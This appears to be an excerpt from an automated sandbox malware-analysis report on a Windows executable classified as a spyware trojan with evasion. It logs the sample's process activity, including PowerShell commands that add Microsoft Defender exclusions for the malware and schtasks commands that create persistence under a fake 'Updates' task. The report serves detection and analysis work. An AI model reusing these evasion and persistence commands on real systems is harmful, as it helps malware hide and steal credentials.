Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, -k.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, y9TACZBKrPpfSKJwvL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, y9TACZBKrPpfSKJwvL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, y9TACZBKrPpfSKJwvL.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@5/4

Source: C:\Users\user\Desktop\FT876567090.exe

Code function: 10_2_004019F0 OleInitialize,_getenv,CreateToolhelp32Snapshot,Module32First,CloseHandle,_malloc,_memset,_memset,_malloc,_memset,LoadLibraryA,

10_2_004019F0

Source: C:\Users\user\Desktop\FT876567090.exe

File created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03

Source: C:\Users\user\Desktop\FT876567090.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5055.tmp

Jump to behavior

Source: FT876567090.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FT876567090.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FT876567090.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FT876567090.exe, 0000000A.00000002.3392046185.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.0000000003290000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, FT876567090.exe, 0000000A.00000002.3392046185.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003611000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003661000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003654000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.0000000003621000.00000004.00000800.00020000.00000000.sdmp, EYDNKhhJr.exe, 0000000F.00000002.3390924672.000000000362F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FT876567090.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\FT876567090.exe

File read: C:\Users\user\Desktop\FT876567090.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FT876567090.exe "C:\Users\user\Desktop\FT876567090.exe"
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Users\user\Desktop\FT876567090.exe "C:\Users\user\Desktop\FT876567090.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe C:\Users\user\AppData\Roaming\EYDNKhhJr.exe
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FT876567090.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp5055.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Process created: C:\Users\user\Desktop\FT876567090.exe "C:\Users\user\Desktop\FT876567090.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EYDNKhhJr" /XML "C:\Users\user\AppData\Local\Temp\tmp619B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Process created: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe "C:\Users\user\AppData\Roaming\EYDNKhhJr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FT876567090.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: gpapi.dll	Jump to behavior
